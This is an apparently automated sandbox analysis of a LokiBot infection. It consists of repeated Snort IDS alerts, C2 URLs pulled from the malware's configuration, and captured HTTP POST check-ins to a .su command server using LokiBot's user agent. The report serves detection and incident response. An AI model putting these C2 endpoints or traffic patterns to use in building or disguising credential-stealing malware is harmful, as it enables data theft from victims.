            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49735 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49735 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49735 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49735 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49735
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:53049 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49736 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49736 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49736 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49736 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49736 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49736
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:60088 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49737 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49737 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49737 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49737 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49737 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49737
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:63562 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49738 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49738 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49738 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49738 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49738 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49738
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:53428 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49739 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49739 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49739 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49739 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49739 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49739
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:65511 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49740 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49740 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49740 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49740 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49740 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49740
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:59820 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49741 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49741 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49741 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49741 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49741
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64595 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49742 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49742 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49742 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49742
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:52079 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49743 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49743
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64823 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49744 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49744
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:51992 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49745 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49745 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49745
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:58119 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49746 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49746
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:49166 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49747 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49747
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:58301 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49748 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49748 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49748
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:63446 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49749 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49749
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:49874 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49750 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49750
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:65459 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49751 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49751 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49751
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:65385 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49752 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49752
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:54153 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49753 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49753 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49753
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64602 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49754 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49754 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49754
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:50784 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49755 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49755 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49755
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64121 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49756 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49756 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49756
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64967 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49757 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49757
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:60825 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49758 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49758 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49758
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:49201 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49759 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49759 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49759
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Source: Malware configuration extractorURLs: http://sempersim.su/gm11/fre.php
            Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
            Source: Joe Sandbox ViewIP Address: 95.213.216.202 95.213.216.202
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
